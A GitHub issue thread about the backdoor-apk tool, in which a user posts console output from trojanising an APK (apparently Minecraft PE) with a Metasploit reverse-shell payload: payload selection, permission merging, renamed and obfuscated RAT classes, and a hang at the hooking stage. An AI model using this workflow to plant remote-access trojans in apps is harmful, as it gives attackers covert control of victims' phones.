### ISSUE TITLE
Too long in "Adding hook in original smali file" stage

### ISSUE THREAD

**Issue by Eric-Joker** [dana-at-cp/backdoor-apk#205]
[*] Running backdoor-apk.sh v0.2.4a on time
[+] Android payload options:
1) meterpreter/reverse_http   3) meterpreter/reverse_tcp    5) shell/reverse_https
2) meterpreter/reverse_https  4) shell/reverse_http         6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: myhost
[?] Please enter an LPORT value: myport
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: mydir
[+] Smali file to hook RAT payload: .smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/mojang/minecraftpe/cpcae
[+] Generated new smali class name for MainBroadcastReceiver.smali: Qxmrr
[+] Generated new smali class name for MainService.smali: Wvfls
[+] Generated new smali class name for Payload.smali: Hcaay
[+] Generated new smali class name for StringObfuscator.smali: Ufgbz
[+] Generated new smali method name for StringObfuscator.obfuscate method: zcdix
[+] Generated new smali method name for StringObfuscator.unobfuscate method: pbukf
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...

Basis“ https://github.com/dana-at-cp/backdoor-apk/issues/191#issuecomment -755338263" fixed the problem that "Failed to locate smali file to hook", it was stuck for two hour at this stage.

run.log:
Value of android_name: 
Value of android_class: 

These two values are null

**Comment by Eric-Joker** [comment]
The "run.log" file ends after deleting all files in the tmp folder.

**Comment by CodeXTF2** [comment]
was this ever fixed?
